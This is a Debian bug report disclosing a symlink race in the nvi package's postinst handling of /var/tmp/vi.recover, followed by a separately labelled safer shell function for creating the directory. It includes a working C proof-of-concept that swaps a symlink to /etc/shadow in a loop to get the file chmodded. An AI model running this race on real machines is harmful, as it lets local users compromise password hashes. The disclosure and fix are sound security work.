Bug#771375: nvi: insecure use of /var/tmp
* Jakub Wilk <jwilk@debian.org>, 2014-11-28, 23:19:
nvi does this in postinst:

    if [[ -L /var/tmp/vi.recover || \
          -e /var/tmp/vi.recover && ! -d /var/tmp/vi.recover ]]; then
        echo "Cannot create recovery directory /var/tmp/vi.recover" 1>&2
        exit 1
    fi
    [ -d /var/tmp/vi.recover ] || mkdir -p /var/tmp/vi.recover
    chown root:root /var/tmp/vi.recover
    chmod 1777 /var/tmp/vi.recover

This is racy.
If there is no symlink protection enabled
(/proc/sys/fs/protected_symlinks), a malicious local user could trick
this code into chmodding arbitrary files.
A PoC exploit is attached. On a test machine I was able to get /etc/shadow
pwned with probability ~0.1%.
--
Jakub Wilk
    #include <sys/stat.h>
    #include <unistd.h>

    int main(int argc, char **argv)
    {
        const char *f = "/var/tmp/vi.recover";
        /* Keep swapping what sits at the path while the postinst runs. */
        while (1) {
            symlink("/etc/shadow", f);
            unlink(f);
            mkdir(f, 0777);
            rmdir(f);
        }
    }
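For comparison, an added example (not from the bug report or the nvi package) of how a postinst can create such a directory without the check-then-chmod window: it relies on mkdir(2) refusing to follow a symlink and never chowns or chmods a path it did not create in the same call. It assumes GNU stat/chown and a sticky, root-owned /var/tmp, so that an entry root just created cannot be swapped out by an unprivileged user; the function name and its second argument (expected owner uid, 0 in a real postinst) are this example's own.

```shell
# Create $1 with mode 1777 owned by uid $2, or verify that an existing
# directory already matches. Never modifies a pre-existing path.
safe_recover_dir() {
    dir=$1      # directory to create, e.g. /var/tmp/vi.recover
    owner=$2    # expected owner uid (0 in the real postinst)

    # mkdir(2) never follows a symlink: if anything already sits at $dir it
    # fails with EEXIST instead of acting on a link target.
    if mkdir -m 1777 "$dir" 2>/dev/null; then
        # We created it this instant. Under a sticky parent only root can
        # remove or replace a root-owned entry, so fixing the owner is safe.
        chown -h "$owner" "$dir"
        return 0
    fi

    # Something already exists. Inspect it with lstat (no -L) and refuse to
    # touch it: a symlink, a non-directory or wrong owner/mode is an error.
    [ -L "$dir" ] && { echo "$dir is a symlink, refusing" >&2; return 1; }
    [ -d "$dir" ] || { echo "$dir exists and is not a directory" >&2; return 1; }
    set -- $(stat -c '%a %u' "$dir")
    if [ "$1" = 1777 ] && [ "$2" = "$owner" ]; then
        return 0
    fi
    echo "$dir has mode $1 owner $2, expected 1777 owner $owner" >&2
    return 1
}
```

The difference from the original snippet is that chown/chmod only ever run on a directory this process has just created; an attacker-placed symlink makes mkdir fail and the function bails out instead of following it.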